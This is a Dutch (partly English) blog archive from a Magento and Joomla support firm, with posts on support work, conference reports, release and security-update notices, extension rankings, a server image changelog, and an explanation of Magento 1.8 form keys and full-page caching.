    Dagelijks ontvangen wij talloze vragen en verhalen omtrent Magento. De ene klant heeft een trage Magento website en de ander heeft een vraag over hoe je product foto's kan toevoegen aan de Magento product pagina. Ook vragen wat betreft Magento SEO, Magento hosting, Magento Mobile, Magento Upgrade enzovoort komen dagelijks voorbij. Maar is elke vraag uniek en/of is deze al eens eerder gesteld?
    Het antwoord is simpel, Ja en Nee!

    Ja, veel vragen die wij ontvangen hebben wij regelmatig voorzien van een passend antwoord.

    Nee, ook regelmatig komen wij nieuwe dingen tegen omtrent Magento webshops die het niet naar behoren lijken te doen en nader onderzocht moeten worden.

    Hoe moeilijk is Magento Support eigenlijk?

    In de Dikke van Dale wordt "support" omschreven als:

    Support (zelfstandig naamwoord)

    • steun, hulp, ondersteuning: in support of tot steun van
    • steun(stuk), stut, drager, draagbalk
    • onderhoud, levensonderhoud, middelen van bestaan

    Magento Support is helaas niet te vinden in de "Dikke van Dale" en kan het best samen gevat worden als:

    Magento Support (een discipline op zich)

    • oplossen magento problemen
    • vragen beantwoorden
    • software bugs oplossen
    • hosting problemen oplossen
    • samen sparren over verbeteringen voor de website
    • business specialist
    • ecommerce guru
    • SEO nerd
    • performance specialist
    • alwetende (laatste redding)

    Wat is het verschil met andere Magento disciplines?

    Zoals we net hebben kunnen lezen is de "vrije" omschrijving van Magento Support nogal ruim. In de praktijk is het een feit dat Magento support zeer omvangrijk en afwisselend is. Om al deze Magento disciplines te kunnen invullen is kennis een must. Achtergrond kennis en studie varieert van grafisch ontwerper, security expert, performance nerd en marketing specialist.

    Wat is de impact van Magento Support na een project fase

    Magento kent vele verschillende disciplines. Meestal begint het met een project en zal na oplevering de webshop in beheer genomen worden.
    Tot de in beheer name wordt er druk gewerkt aan de realisatie van de Magento webshop. Na oplevering begint het eigenlijk voor de klant pas. Dan moet de webshop producten verkopen waardoor aandacht besteed moet worden aan marketing, sociale media enz.

    De implementatie partner is vaak alweer begonnen met een nieuw project en is meestal niet ingericht voor nazorg of kleine wijzigingen. Tevens zijn zaken zoals Magento SEO, Magento Mobile en Performance tuning vaak niet direct opgepakt in het project. Voor deze zaken is kennis nodig die niet altijd in een projectorganisatie beschikbaar is.

    Onderhoud is nodig door veranderingen op het internet bijvoorbeeld bij Google of concurrentie op het internet. Vaak zijn deze kleine tot middelgrote wijzingen niet goed in te plannen in een project organisatie omdat zij gericht zijn op de grote projecten.

    Daarom zijn wij ooit begonnen met SupportDesk, de partner voor uw Magento Support. We helpen u graag. 

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Webdesginer Magazine - Geld verdienen met je webshop

    geld verdienen met je webshopOok dit jaar is er weer een speciale uitgave uitgekomen van het blad Webdesiger Magazine tijdens de Webwinkel Vakdagen. De special van dit jaar is nog uitgebreider dan afgelopen jaar met veel uitgebreide verhalen over hoe je geld kunt verdienen met je webshop.

    Magento Upgrade, Mobile en Hosting

    Magento mag in deze special dan ook niet vergeten worden en wordt in deze uitgave veel genoemd. Dit jaar is gast redacteur Ray Bogman goed voor vier artikelen. Hij schrijft over;

    • Magento mobiel - Ga je voor responsive design of Dynamic Serving?
    • Magento upgraden - To upgrade or not to upgrade, that’s the question
    • Magento-hosting - een verhaal apart
    • Dé Magento - extensies top 10

    De waarheid achter Magento Mobile SEO

    webdesginer magazine webwinkel vakdagen 2014Naast de bijdrage in het magazine heeft Ray Bogman tijdens de Webwinkel Vakdagen ook twee dagen een presentatie verzorgd over "de waarheid achter Mobile SEO".

    Beide dagen zat de zaal bomvol en werd de laatste actuele status omtrent Magento mobile SEO gedeeld. Tijdens de klant case van Condoom-Anoniem.nl tijdens de presentatie werd aangetoond dat bij een goed implementatie van een mobile oplossing voor Magento er een conversie optimalisatie van ruim 50% gehaald kon worden. De speciale uitgave 'Geld verdienen met je webshop' van Webdesginer Magazine ligt vanaf heden in elke boekhandel of is te bestellen via de shop van F&L.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Developers Paradise 2014

    magento developers paradise 2014

    Afgelopen week is SupportDesk samen met Byte Internet, Kega en Dutchento afgereisd naar Kaprun (Oostenrijk) voor de jaarlijkse Magento Developers Paradise Snowcamp.

    Ook dit jaar waren vele Magento vrienden afgereisd uit alle werelddelen om de laatste status en actuele kennis te delen omtrent Magento maar ook OroCRM.

    Magento 2.0 Development Update

    Anton Makarenko en Anton Krill waren beide namens Magento (eBay) aanwezig om de actuele status te delen van de ontwikkeling van Magento 2.0 waar al ruim 2 jaar druk aan ontwikkeld wordt. Anton Makarenko gaf ons een uitgebreide update van het nieuwe Magento Templating system en de eenvoud van het maken van nieuwe Magento templates. Veel is namelijk veranderd met als doelstelling eenvoudige ontwikkeling van Magento templates mogelijk te maken. 

    Anton Krill gaf ons een kijkje in de keuken van de nieuwe Magento 2.0 architectuur. In Magento 2.0 zullen namelijk alle modules voorzien worden van hun eigen template bestanden zodat upgraden of deinstalleren veel eenvoudiger en overzichtelijker is dan met het huidige Magento 1.0. Eenvoud is de kern!

    Magento en Varnish

    Ook werkt er uitgebreid ingezoemd op de actuele performance verbeteringen van Magento en het gebruik van Varnish hier in. Onze concullega Sylvain Rayé gaaf hier een erg leuke presentatie over met als mascotte Achmed "The dead terrorist" en als motto "I Varnish You"

    Magento Doctor

    Om de pistes ook dit jaar weer veilig te houden waren de Magento Doctors beschikbaar voor alle belangrijke Magento problemen in de sneeuw. Guido Jansen en Ray Bogman stonden 3 dagen ter beschikbaar voor de laatste ins en outs omtrent Magento en de Magento community. Zo zijn de eerste ideeen voor een Meet Magento 2014 uitgebreid de revu gepasseerd.

    The Truth of Magento Mobile SEO

    Gezien de laatste onwikkelingen in Magento, Performance, Mobile en SEO had Ray Bogman een presentatie voorbereid omtrent de waarheid achter Mobile SEO. In deze case werd de webshop van Condoom-Anoniem voorzien van een "dynamic-serving" mobile Magento oplossing welke een conversie optimalisatie van meer dan 50% opbracht.

    OroCRM - CRM voor e-commerce

    Ook dit jaar was voormalig architect van Magento, Dmitriy (Dima) Soroka aanwezig. Hij is momenteel Vice President of Engineering van OroCRM en MageCore Inc. Hij vertelde de laatste status omtrent OroCRM en een actuele koppeling met Magento, de OroCRM Bridge.

    OroCRM staat momenteel gepland voor livegang op 1 April 2014 met de eerste stable release.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Meet and Greet agenda 2014

    Na een innoverend support jaar in 2013 gaan wij in 2014 er direct weer keihard tegen aan met het optimaliseren van de nodige Magento en Joomla! websites. Naast het direct ondersteunen van de nodige websites vinden wij het ook belangrijk om onze kennis en ervaring met anderen te delen tijdens bijeenkomsten. 

    De komende periode zijn wij op diverse plekken aanwezig en vinden het altijd leuk om dan onze klanten persoonlijk te ontmoeten.

    Kortom, ben je ook aanwezig tijdens een van onderstaande events en vind je het leuk om ons even te spreken of altijd al willen weten welk mensen achter SupportDesk zitten, kom dan eens langs voor een kop koffie/thee of wellicht een borrel.

    Onze Meet and Greet agenda:

    Naast deze events organiseren wij maandelijks en alweer voor het 4de jaar op rij de Magento User Group te Amsterdam samen met Byte Internet. 

    De agenda voor de komende periode is:

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento User Group: GIT en Magento

    Melvyn SopacuaVoor de laatste keer in 2013 vond er een Magento User Group plaats bij het Magento Competence Center. Tijdens deze sessie behandelden we Git voor Magento. Deze keer nam Melvyn Sopacua de Magento fanaten mee in de wereld van versiebeheer, branching en nog veel meer!

    Git & Janneke, een introductie over Git

    Git is een open source versiebeheersysteem en wordt ook wel een softwarebroncode-managementproject genoemd. Git is gemaakt door Linus Torvalds, de ontwikkelaar van Linux. Iedere Git werkmap geeft een compleet overzicht van alle gedane wijzigingen en versies. Het verschil ten opzichte van het ‘Concurrent Versions System’ (CVS) of Subversion (SVN) is dat Git niet afhankelijk is van een gemeenschappelijke locatie of een centrale server. 

    Git branching model - Wat is branching?

    Een branche (oftewel een kopie of tak(je)) is een aparte omgeving (development) binnen de Git hoofdmap (master) waar je modules of templates voor je website in ontwikkelt. Nadat dit gereed is, voeg je deze twee omgevingen weer samen in de hoofdmap. Het grote voordeel van branching is dat je met meerdere mensen aan een gedeelte van de website kunt werken.

    Git en Magento

    Een belangrijke toepassing voor Magento is .gitignore, dit is een optie waarmee je aangeeft welke bestanden wel of niet in Git meegenomen moeten worden. Denk voor Magento aan de map met media bestanden.

    MageFlow

    Na de presentatie van Melvyn gaf Ray Bogman een korte toelichting over een nieuwe manier van versiebeheer, namelijk met MageFlow. MageFlow is een SaaS oplossing waarmee je op een zeer eenvoudige manier je Magento omgeving kunt beheren en upgraden. Deze oplossing is binnenkort beschikbaar en kan zowel gekoppeld worden aan GitHub als aan BitBucket. Met de komst van MageFlow wordt versiebeheer een fluitje van een cent!

    Git workshop

    Tot slot gaf Flip Hess een korte demonstratie van Git. Hij paste als het ware de theorie die Melvyn had behandeld toe in de praktijk, gebruikmakende van deze handige website. Heb je de demo gemist of heb je interesse in een flipsende ;-) workshop Git & Janneke van Flip? Laat hier dan jouw reactie achter. Bij voldoende geïnteresseerden plannen we in februari een workshop. We houden je op de hoogte!

    Planning Magento User Groups 2014

    Magento User Group AmsterdamDe planning voor de eerste helft van 2014 hebben we onlangs op onze Meetup pagina geplaatst. De onderwerpen zijn bepaald op wat de usergroup graag samen wil behandelen, bediscussïeren of meer over wil weten. Iedereen bedankt voor de input!

    • 30 januari 2014: Traffic naar je shop genereren, hoe doe je dat en hoe ga je ermee om?
    • 18 februari 2014: Magento koppelen aan externe systemen (OroCRM, OpenERP en ShopCTRL)
    • 25 maart 2014: Magento review and rating, hoe belangrijk is een goede beoordeling en hoe krijg
    • 24 april 2014:Magento hosting? Wat heb ik nou echt nodig en waar moet ik op letten?

    Lijkt het je interessant om bij een of meerdere MUG’s mee te discussiëren? Klik dan op de link(s) hierboven of bezoek Meetup pagina. We zien je ook in 2014 weer graag bij het Magento Competence Center!

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Joomla Update versie 2.5.17 en 3.2.1

    Joomla 2.5Gisteren heeft het Joomla! Project twee upgrades uitgebracht, namelijk Joomla! 2.5.17 en Joomla! 3.2.1. Het zijn nieuwe versies met nieuwe features en bug fixes. Heb je een Joomla! 2.5.x of 3.x versie, dan raden wij aan zo spoedig mogelijk te updaten.

    Joomla! 3.2.1

    Joomla! 3.2.1. bevat een aantal nieuwe handige features. Waaronder:

    • Content versiebeheer
    • Vele verbeteringen m.b.t. gebruikersinterface
    • Eenvoudige meertalige installatie voor de 64 officieel ondersteunde talen
    • Ingebouwde Joomla! Extensions Finder waarmee eenvoudig extensies uit de Joomla Extensions Directory via de backend geïnstalleerd kunnen worden (momenteel meer dan 4000 extensies)
    • Verbeterde veiligheid met sterke wachtwoorden en twee-staps authenticatie
    • Nieuw rapid development framework voor ontwikkelen van nieuwe extensies

    Meer informatie over deze release vind je op de website van Joomla!.

    Joomla! 2.5.17

    Ook voor de Joomla! 2.5. is er een nieuwe release uitgebracht: Joomla! 2.5.17. We raden u aan uw Joomla 2.5.x te upgraden naar deze versie.

    Joomla! 2.5.1 bevat de volgende verbeteringen:

    • Registratie email voor meertalige websites
    • Een update van 2.5.14 naar 2.5.16 foutmeldingen
    • Recaptcha update van de Google’s API

    De specifieke bug fixes zijn terug te vinden in de release notes van Joomla! 2.5.17.

    Omdat dit een maintenance release is, raden we onze klanten sterk aan direct te upgraden!

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento 1.8.1 nu beschikbaar

    Magento 1.8.1.0
    Na de onlangsverschenen Magento 1.8 is nu ook eindelijk de nieuwe Magento 1.8.1.0 versie beschikbaar.

    De hoogtepunten kort samengevat:

    BTW-berekening

    De Magento Community Edition 1.8.1.0 biedt meer accurate en consistente Belasting Toegevoegde Waarde (BTW) en Vaste Goederen Tax (FPT) berekeningen voor de Magento admin, facturen en creditnota's. Het verbetert ook de BTW-berekeningen voor grensoverschrijdende transacties, gebundelde producten, en multi-fiscale scenario's, evenals ondersteunt de afgedankte elektrische en elektronische apparatuur verwijderingsbijdragen in de EU.

    Functionele verbeteringen

    Magento 1.8.1.0 bevat belangrijke verbeteringen in het winkelwagentje, kassa, content management systeem, en product-import en export. Veel van deze bugfixes kwamen van Magento Hackathons in Zurich en Los Angeles.

    Magento beveiliging verbeteringen

    Magento 1.8.1 diverse belangrijke beveiligings verbeteringen die de Magento release stabieler maken. Bij deze raden wij dan ook aan om zo spoedig mogelijk te updaten naar Magento 1.8.1.

    Magento upgraden

    Met de komst van Magento 1.8.1 is het belangrijk zo snel mogelijk te upgrade. In de Webdesigners Magazine Special van 2014 (uitgave tijdens de Webwinkel Vakdagen) zal Magento Evangalist Ray Bogman een uitgebreid verhaal publiceren over wat er komt kijken bij een Magento Upgrade.

    Magento Security Patch 

    Met de komst van de onlangs verschenen Magento 1.8.1 versie is er een belangrijke security patch uitgekomen welke geldt voor alle Magento versie van 1.8 en lager. Wij raden aan om deze spoedig te installeren.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Joomla! 3 - Extension Development

    Joomla! 3 - Extension DevelopmentOnlangs verscheen er een nieuw Joomla boek gepubliceerd door Packtpub genaamd: Joomla! 3 Extension Development-Third Edition. Het boek geschreven door Tim Plummer en is een "must read" voor elke Joomla! liefhebber.

    Joomla! 3 - Extension Development

    Joomla! 3.0 is de eerste LTS (Long Term Release) versie van de Joomla 3 reeks. De volgende LTS zal Joomla 3.5 genoemd worden en verschijnt eind 2013. Joomla 3.0 geeft je dan ook een kijkje in de keuken wat er allemaal gaat komen en zal veranderen.

    Het Joomla 3.0 Extension Development is dan ook vooral bedoeld voor de hardcore Joomla! fan, programmeur of Joomla freaks die graag een overzicht hebben wat er allemaal veranderd is.

    Het boek gaat in op de volgende zaken:

    • Plugin Development
    • Module Development
    • Component Development
    • Backend Component Development
    • Security
    • Hoe maak ik een package
    • Extending Componenten, Modules en Plugins

    Zoek de verschillen tussen Joomla 2.5 en 3.0 

    De verschillen tussen Joomla! 1.5 en Joomla! 2.5 waren zeer groot, eigenlijk was het een complete rewrite van de code. Ondersteuning van beide systemen was dus niet bepaald eenvoudig als programmeur.

    Met de komst van Joomla! 3.0 zijn de verschillen tussen Joomla! 2.5 in de code gelukkig veel minder. En kom vooral ten goede aan de juiste ondersteuning van de compomenten, modules en plugins. Dit zal een Joomla! update of upgrade alleen maar eenvoudiger maken.

    Wat is nieuw in Joomla 3.0

    • Twitter Bootstrap
    • jQuery JavaScript Library
    • LESS CSS
    • Tags
    • PostgreSQL database support

     

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Snelste Magento Mobile webshop in de Wereld!

    Magento MobileAfgelopen jaren heeft SupportDesk (voorheen Jira ICT) niet stilgezeten als het gaat om webshop en website performance optimalisatie voor Magento en Joomla. Jira ICT was destijds de eerste in Nederland die dit oppakte.

    In het begin was de focus alleen op desktop website en webshop-optimalisatie, maar met de komst van de mobile smartphone kwam er een hele nieuwe discipline bij. Ray Bogman, onze performance-specialist, volgde de ontwikkelingen dan ook al sinds 2010 op de voet en presenteerde onlangs een onderzoek omtrent de "Mythes van Responsive webdesign" en de "Waarheid van Mobile SEO".

    Magento Mobile

    In 2010 was Jira ICT de eerste Magento Partner in Nederland, die de Magento webapp voor Iphone implementeerde bij Condoom-Anoniem.nl.

    Helaas was het destijds net te vroeg, omdat de doelgroep nog niet massaal een Iphone in bezit hadden en de App uit de store wilden downloaden. Daarom is deze actie na ruim 1 jaar weer uitgezet. Lees hier meer.

    Wat we destijds al wel wisten is dat dit de toekomst zou worden, het was alleen wachten op de toestellen en een goede internet toegang.

    Dynamic Serving, Responsive Design of M.

    Met de snelle groei van mobile internet i.c.m. een website of webshop kwam het M [dot] domein (m.example.com) als één van de eerste met een echte oplossing om snel en eenvoudig een website of webshop voor een smartphone aan te bieden. Zodra men naar de website ging werd je vaak direct doorgestuurd naar een andere domein beginnende met M [dot]. De oplossing was doeltreffend maar werd als aparte website gezien door zoekmachines(slecht voor SEO!).

    Reponsive design heeft bijna geen aankondiging meer nodig gezien de hoge populariteit. Maar onder de streep komt het er op neer dat het theme of template van je Magento of Joomla website zelf meeschaalde, afhankelijk van de grootte van je scherm. Superhandig blijkt zo in de praktijk, maar helaas zitten hier ook veel nadelen aan. Zo zijn de laadtijden van een responsive design op een smartphone vaak ruim boven de 5 à 10 seconden. Hierdoor werken standaard desktop-functies zoals inzoomen vaak toch anders (of helemaal niet) op een kleine smartphone dan achter een desktop met een muis in je hand.

    Dynamic Serving is een nieuwe techniek, die in principe een combinatie is tussen een M [dot] domein en een webapp. Het komt er op neer dat door middel van een aparte theme/template voor Magento of Joomla! en de smartphone die je gebruikt, je een aparte website of webshop krijgt te zien met behoud van dezelfde URL [domeinnaam]. Het grote voordeel is de performance optimalisatie- en snelheidswinst. Lees verder voor een uitgebreide case study.

    Snelste Magento mobile webshop

    Case Study: Condoom Anoniem

    Gezien de historie met Condoom Anoniem wilden zij ook weer de eerste in Nederland zijn met een Dynamic Serving oplossing voor hun Magento multi-store. Deze implementatie is eind Augustus 2013 geïmplementeerd en was direct succesvol met een zeer positieve response en conversie. Hierover werd onlangs tijdens de Magento User Group: SEO Mobile gepresenteerd.

    Snelste Magento mobile - Case Study

    Meer weten over de Case Study van Condoom Anoniem: High Performance Magento Mobile, lees hier verder.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Top 10 Magento Extension

    MUG Top 10 Magento Extension

    Magento User Group Amsterdam

    Afgelopen dinsdag 26 November heeft de Magento User Group Amsterdam voor de 2 keer een Top 10 verkiezing gedaan van de beste Magento Extentions van dit moment.

    De samenstelling van de modules kon vooraf worden ingediend en is aangevuld door de aanwezige MUG-ers. Dankzij de vele inzendingen was de keuze enorm en hebben we bijna een gelijk spel.

    Omdat we dit jaar zoveel inzendingen hebben ontvangen zijn deze onderverdeeld in 4 categorieen om elke extenties een goede kans te geven om te winnen.
    De 4 categorieen zijn:

    • Magento Backend Extensions
    • Magento Frontend/Theming Extensions
    • Magento Marketing Extensions
    • Slechtste Extensions

    mug-top-10-magento-extensionMagento Backend Extensions

    1. Lesti::FPC [Gordon Lesti]
    2. Pdf Customiser [Fooman]
    3. AOE Scheduler [Fabrizio Branca]
    4. SMTP Pro [Aschroder]
    5. Simple Configurable Products [Organic]
    6. Delete Any Order [Yireo]
    7. Redis Backend Cache [Colin Mollerhour]
    8. Custom order nummering Aschroder]
    9. Sisow [Sisow]
    10. E-boekhouding [E-Boekhouden]
    Tip: PostNL [de nieuwe magento module] van media januari 2014

    Magento Frontend/Theming Extensions

    1. Checkitout! [EcomDev]
    2. OneStepCheckout [OneStepCheckout]
    3. Skip Checkout Step 1 [Crius]
    4. Fishpig WordPress [Fishpig]
    5. Argento theme [Argento]
    6. Custom stock status [Amasty]
    7. Ultimate One Page Checkout for Magento - Fire Checkout [TemplatesMaster]
    8. Advanced Template Hints [[Fabrizio Branca]
    9. Sphinx Search Ultimate [Mirasvit]
    10. Improved Sorting [Amasty]

    mug-top-10-magento-extension-2Magento Marketing Extensions

    1. AW Blog [AheadWorks]
    2. MageMonkey [eBizmarts]
    3. Follow Up Email [AheadWorks]
    4. Fooman Google Analytics [Fooman]
    5. Amasty metaTag templates Amasty]
    6. Mirasvit Feed Export [Mirasvit]
    7. Go Mage Feed pro [GoMage]
    8. Cart 2 Quote [Cart 2 Quote]
    9. Semantic SEO for Rich Snippets [Semantic] 
    10. Email tester [Yireo]
    Tip: SEO autolink [Mirasvit]

    Slechtste Extentions

    1. Alle ioncube extensions
    2. Alle aziatische extensions 
    3. Alle atoic extensions

    Reacties van MUG-gers:

    My best MUG ever! - Job
    Super! - Sean
    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Jira image V7 [Magento Optimized]


    De nieuwste versie van het Jira image, V7 is beschikbaar bij CloudVPS!
    Deze VPS image is alweer de 7e release in ruim 2,5 jaar tijd en ook nu weer voorzien van de laatste optimalisatie-aanpassingen voor zowel Magento als Joomla!.

    De basis van deze V7 release is gebaseerd op:
    - Centos 6.4
    - Directadmin
    - Apache 2.2.x
    - PHP 5.4.x
    - Mysql 5.5.x
    - Redis server 2.6.x
    - New Relic

    De complete changelog bevindt zich in de "root" directory van de VPS.

    Wat is er nieuw in V7

    • phantomjs [phantomJS is een headless webbrowser welk via de command prompt veranderd in een superhandige debug tool en nog veel meer....]
    • JpegOptim [optimalisatie van JPEG foto's]
    • OptiPNG [optimalisatie van PNG foto's]
    • n98-magerun [het zwitsers zakmes voor Magento debugging]
    • OpCache (+ opcache viewer) [opcode cache voor PHP, incl een php/html viewer] [vervanger van APC]
    • JSmin [minimaliseren van JavaScript bestanden]
    • CssTidy [minimaliseren van CSS bestanden]
    • Mage-Perftest [Magento performance en loadtesting tool]

    Naast deze nieuwe features zijn alle PHP, Apache, MySql en overige Directadmin en Linux patches voorzien van de laatse update.

    Naast de voordelen van V7, was Jira Image V6 een grote stap voorwaarts. Wil je hier mee over weten en over de voordelen van Magento en Redis lees hier dan verder.

    Blog: Jira image V6 [Magento Optimized]
    Blog: Magento Redis Optimization: How To

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Joomla Security Update versie 2.5.16

    security release

    Het Joomla project heeft vandaag een nieuwe Joomla release vrijgegeven, versie 2.5.16. Het betreft hier een Joomla Security release.
    Naast de 3 Joomla Security aanpassingen zijn tevens 32 bug gefixed.

    Meer weten welke issues gefixed zijn, kijk dan op de Joomla 2.5.16 website

    Deze Joomla 2.5.16 release werd op de zelfde dag beschikbaar na het verschijnen van Joomla 2.5.15 welke blijkbaar nog diverse security problemen bleek te hebben.

    Joomla 2.5.16 heeft 3 security issues:

    • High Priority - Core XSS Vulnerability meer info
    • Medium Priority - Core XSS Vulnerability meer info
    • Medium Priority - Core XSS Vulnerability meer info
    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento 1.8 "form_keys" impact on FPC

    Magento 1.8 Form Keys

    Since the beginning of time Magento's backend contained a form key that protected against XSS attacks [1]. With Magento 1.8 the form key has entered the frontend for pretty much the same reason: to protect against form submission from another website, using your browser. A malicious attacker can add stuff to your cart while you're in a different browser tab or even complete an order for you. This relies on predictable URLs, because the site will not have access to the actual HTML content in the browser tab where you have your Magento order waiting. Everything sent to the Magento store will however submit your cookies and thus use your session.

    Enter the form key

    By adding a unique key to each form or to each link that generates an action on the server, the URL or form content becomes no longer predictable. The form key is stored in the session data and validated upon submission to the server. If they don't match - you get a form key error and the action is not completed.

    The way it is implemented in Magento 1.8 is not straight-forward for most of the Magento FPC implementations out there and will generate form key errors, because by default they will cache the pages containing the form key of the user that first requested the page and caused it to be stored in the full page cache.

    Magento frontend implementation

    First of all, the form key is not a separate block which can be excluded from FPC. And to make things worse, it's part of top level pages you will want to cache, like categories and product detail and even the homepage if it contains "add to cart" links (which most homepages out there do). For an example, take a look at app/design/frontend/base/default/template/catalog/product/list.phtml. You will notice several calls to $this->getAddToCartUrl() which is defined in app/code/core/Mage/Catalog/Block/Product/Abstract.php. In there you'll see that unconditionally, the form_key is added to the URL parameters.

    On the other hand, using a separate block that would allow FPC implementors to mark it dynamic, would incur a heavy performance penalty, because every link that contains a form_key or form that contains a form_key input element, would have delays for loading and executing the block from a separate file and effectively only outputs sixteen characters fetched from the user's session data.

    But here's the good part

    The good thing is, that a solid FPC implementation should also have code to replace the session ID that is output in some pages with the actual session ID from the currently viewing user. This code can be expanded with a replacement for the form key and this is exactly how Magento Enterprise is doing it.

    When a cacheable page is stored in the FPC container, one replaces the form key with a placeholder. After retrieving the stored HTML and before serving the cached page, the placeholder is restored with the form key stored in the user's session or if one does not exist, one should be generated (and subsequently stored in the user's session).

    Pages that receive the form key should in general not be cached or at least (partly) tailor to the current user ("dynamic blocks"). This is where the validation code will be called and when done right should no longer generate form key errors.

    Update

    We know of the following FPC implementations who have patched their code:

    If you are the maintainer of an FPC implementation or know that an implementation is fixed or not affected, feel free to provide me the details and we'll update the list as soon as possible.

    Reference:
    [1] http://net.tutsplus.com/tutorials/php/secure-your-forms-with-form-keys/

    meer info   of   

    Bel nu! 020 337 5961

    Melvyn SopacuaDit artikel is geschreven door Melvyn Sopacua, medior support medewerker gespecialiseerd in performance en migraties.

    LinkedIn

    https://github.com/GordonLesti/Lesti_Fpc/commit/e3725928fcac1924ed663c33bd4067e99b3e7eb1
  • Magento User Group: Werken met jouw backend

    Magento User GroupHet zat afgelopen donderdag weer vol met enthousiaste MUG’ers. Het Magento Competence Center organiseerde een Magento User Group die in het teken stond van jouw backend. Er werd gesproken over hoe je het beste jouw backend kunt beheren. Ook kwamen enkele andere onderwerpen aan het licht zoals het Developers Paradise op Mallorca en de nieuwe 1.8 update van Magento.

    Magento backend

    Magento User GroupVeel werd er gepraat over hoe je het beste jouw Magento backend kunt beheren met extra plug-ins of aanvullende software, tijdens verschillende fases van je webwinkel. Jan Lukkien, eigenaar van Lumisa B.V., en ook Ray Bogman vertelde over hun ervaringen.

    Developers Paradise

    De sessie begon met een korte samenvatting van het Developers Paradise. Er werd daar voornamelijk gesproken over Magento 2.0, welke nog steeds op zich laat wachten. De laatste verwachtingen voor de release zijn nu ergens in 2014. Veel waren het er over eens dat webshops die op de huidige Magento 1.x serie draaien waarschijnlijk compleet herschreven zullen moeten worden willen ze kunnen werken met de nieuwe serie. De vraag was natuurlijk of webwinkeleigenaren hier wel op zitten te wachten.

    Magento 1.8 update

    Vlak voor deze MUG werd er een nieuwe update voor Magento uitgegeven. Deze nieuwe 1.8 versie werd kort even besproken en bevat onder andere een verbeterd BTW systeem en enkele bugfixes. Daarnaast ondersteunt Magento nu standaard Redis als caching backend, hierdoor is het nu niet meer nodig om gebruik te maken van een extra plug-in voor deze ondersteuning. Hier hebben we al een praktisch blog over geschreven: Magento 1.8.0.0 nu beschikbaar. Later dit jaar wordt er nog een update verwacht, versie 1.8.1 zal voornamelijk nog meer bugfixes bevatten.

    CRM & ERP

    Tijdens de MUG werd er ook veel aandacht besteed aan ORO CRM, dit CRM pakket is volop in ontwikkeling en wordt gebouwd door oud Magento ontwikkelaars. Het is net zoals de Magento Community editie open source. Veel inhoudelijke details bleven echter nog even uit, dit omdat het pakket nog in ontwikkeling is. De presentatie van ORO CRM was een aanleiding tot discussie over verschillende CRM systemen en uiteindelijk ERP tools om gebruik van te maken in combinatie met Magento. Er werden verschillende pakketten besproken die het leven van een webwinkel eigenaar gemakkelijk kunnen maken en veel van de MUG’ers deelden graag hun ervaringen. Het was een interessante MUG sessie waarin veel nuttige informatie werd besproken. Op naar de volgende!

    Waar kan ik me inschrijven voor de volgende MUG?

    Wij zien je met veel plezier in de Magento Competence Center te Amsterdam.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Magento 1.8.0.0 nu beschikbaar


    magento 1.8.0.0

    Na 1 jaar en bijna 3 maanden is hij er dan ook eindelijk, de nieuwe Magento 1.8.0.0 versie. De Magento 1.8 is dan ook de langverwachte upgrade sinds Magento 1.7.0.2.

    De hoogtepunten kort samengevat:

    • Compleet herschreven BTW berekening, afronding en configuratie
    • Aangepast cache mogelijkheid voor enkelvoudige server omgeving
    • Stantaard Magento Redis backend cache ondersteuning (Let op! De mappenstructuur is anders dan de losse module, de Magento Redis backend cache staat nu in /lib/Cm)
    • Magento Redis sessions ondersteuning
    • De php_value memory_limit verhoging naar 512MB
    • De php_value max_execution_time verhoogd naar 18000
    • Onepage checkout template verbeteringen (elke process stap heeft zijn eigen .phtml bestand gekregen zoals billing.phtml, payment.phtml, shipping.phtml, shipping_method.phtml)
    • Centinel 3D secure verbeterde authenticatie
    • Toevoeging van Zend Db Statement Adapter voor optimalisatie van queries richting de database
    • Optimalisatie van de XMLConnect voor Magento Mobile en toevoeging van betere offline mogelijkheiden
    • langere wachtwoorden toegestaan, tot 100 karakters
